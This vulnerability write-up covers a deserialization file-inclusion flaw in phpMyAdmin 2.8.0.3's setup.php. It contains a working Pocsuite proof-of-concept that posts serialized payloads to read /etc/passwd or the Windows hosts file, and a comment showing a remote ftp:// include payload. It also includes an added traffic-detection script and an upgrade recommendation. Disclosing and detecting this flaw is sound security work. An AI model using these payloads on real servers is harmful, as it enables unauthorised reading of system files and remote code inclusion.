Posted 4 weeks ago (12-17) in Vulnerability Database | 2 comments

    0x01 Code Audit

    The vulnerable file is /scripts/setup.php, lines 10 and 28:

    [Screenshot: phpMyAdmin 2.8.0.3 arbitrary file inclusion vulnerability]

    The user-supplied configuration parameter is passed straight to unserialize, and setup.php includes common.lib.php.

    Go to line 555 of common.lib.php:

    [Screenshot: phpMyAdmin 2.8.0.3 arbitrary file inclusion vulnerability]

    common.lib.php in turn includes Config.class.php.

    Now look at line 284 of Config.class.php:

    [Screenshot: phpMyAdmin 2.8.0.3 arbitrary file inclusion vulnerability]

    And finally the load method:

    [Screenshot: phpMyAdmin 2.8.0.3 arbitrary file inclusion vulnerability]

    0x02 Reproducing the Vulnerability

    POC:

    #!/usr/bin/env python
    # coding: utf-8
    from pocsuite.api.request import req
    from pocsuite.api.poc import register
    from pocsuite.api.poc import Output, POCBase
    import re
    
    class TestPOC(POCBase):
        vulID = '1'  # ssvid
        version = '1.0'
        author = ['whoam1']
        vulDate = '2016-04-23'
        createDate = '2016-08-24'
        updateDate = '2016-08-24'
        references = ['http://www.seebug.org/vuldb/ssvid-']
        name = 'phpmyadmin unserialize getshell'
        appPowerLink = 'https://www.phpmyadmin.net/'
        appName = 'phpmyadmin'
        appVersion = '2.8.0.3'
        vulType = '文件包含'
        desc = '''
        /scripts/setup.php
        '''
        samples = ['']
        install_requires = ['']
        # Avoid third-party libraries where possible; when one is required, fill in this field
        # as described in https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明
    
        def _attack(self):
            # A remote include would use a payload of the form:
            # configuration=O:10:"PMA_Config":1:{s:6:"source",s:38:"ftp://user:user@127.0.0.1/ftp.txt";}&action=test
            # No separate attack mode is implemented; fall back to verification.
            return self._verify()
    
        def _verify(self):
            result = {}
            # Fetch the front page to pick up a phpMyAdmin session cookie and the Server header
            requ = req.get(self.url)
            coo = re.compile(r"'phpMyAdmin=(.*?);")
            cookie = coo.findall(str(requ.headers))[0]
            flag = re.compile(r"erver': '(.*?)',")
            flags = flag.findall(str(requ.headers))[0]
            vul_url = self.url+'/scripts/setup.php'
            header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','cookie':'phpMyAdmin='+str(cookie),'Content-Type': 'application/x-www-form-urlencoded','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'}
            # A Server header such as "Apache/2.2 (Ubuntu)" contains '(' and is taken to mean a Linux host
            if '(' in flags:
                # Serialized PMA_Config whose "source" property ends up in the include() of load()
                poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'
                req_post = req.post(vul_url,headers=header,data=poc)
                if '/bin/bash' in req_post.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                return self.parse_output(result)
            else:
                poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:37:"c:/windows/system32/drivers/etc/hosts";}&action=test'
                req_post = req.post(vul_url,headers=header,data=poc)
                if 'Windows' in req_post.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                return self.parse_output(result)
    
        def parse_output(self, result):
            # Wrap the verification result in a pocsuite Output object
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('Internet nothing returned')
            return output
    
    
    register(TestPOC)
    
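The chain above (configuration -> unserialize -> PMA_Config -> load() -> include of the `source` property) gives a defender a precise thing to look for in traffic: a POST to /scripts/setup.php whose configuration field deserializes to a PMA_Config with a source property. The following is an added example, not code from the original post or from phpMyAdmin; the sample requests are constructed, and the names analyse_configuration and scan_requests are mine.

```python
import re
from urllib.parse import unquote_plus

# Serialized PMA_Config carrying a "source" property, as in
#   O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}
# The page's POC writes ',' instead of ';' after the key, so both are accepted.
PMA_CONFIG_RE = re.compile(
    r'O:10:"PMA_Config":\d+:\{.*?s:6:"source"[;,]s:(\d+):"(.*?)";', re.S)
REMOTE_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def analyse_configuration(body):
    """Parse a POST body; describe a PMA_Config 'source' payload or return None."""
    m = PMA_CONFIG_RE.search(unquote_plus(body))
    if not m:
        return None
    declared_len, path = int(m.group(1)), m.group(2)
    return {
        "path": path,
        # a URL scheme means a remote include (the ftp:// variant in the POC comment)
        "kind": "remote" if REMOTE_SCHEME_RE.match(path) else "local",
        # PHP stores the byte length; a mismatch marks a hand-crafted payload
        "length_ok": declared_len == len(path.encode("utf-8")),
    }


def scan_requests(requests):
    """requests: iterable of (method, url_path, body); alert on setup.php gadgets."""
    alerts = []
    for method, url_path, body in requests:
        if method.upper() != "POST" or not url_path.endswith("/scripts/setup.php"):
            continue
        info = analyse_configuration(body)
        if info:
            alerts.append({"url": url_path, **info})
    return alerts


# Constructed sample traffic (not captured data): one benign GET, three attacks
SAMPLE_REQUESTS = [
    ("GET", "/phpmyadmin/index.php", ""),
    ("POST", "/phpmyadmin/scripts/setup.php",
     'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'),
    ("POST", "/phpmyadmin/scripts/setup.php",
     "configuration=O%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3B"
     "s%3A33%3A%22ftp%3A%2F%2Fuser%3Auser%40127.0.0.1%2Fftp.txt%22%3B%7D&action=test"),
    ("POST", "/phpmyadmin/scripts/setup.php",
     'configuration=O:10:"PMA_Config":1:{s:6:"source";s:99:"/etc/passwd";}&action=test'),
]
```

Run scan_requests(SAMPLE_REQUESTS) to get one alert per attack request, each tagged local or remote; a WAF or log pipeline can apply the same regex to decoded POST bodies.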

    0x03 Remediation
    Upgrade to the latest version.


    Unless otherwise noted, all articles on this site are original works of the New Century Security Community; when reposting, please credit the source: http://www.xssec.org/1431.html


    Comments

    1. I don't know how to exploit it.

      wwp1241144977, 3 weeks ago (12-22)
    2. Could you post some tutorials on how to use the POC?

      酷似小祖宗, 4 weeks ago (12-18)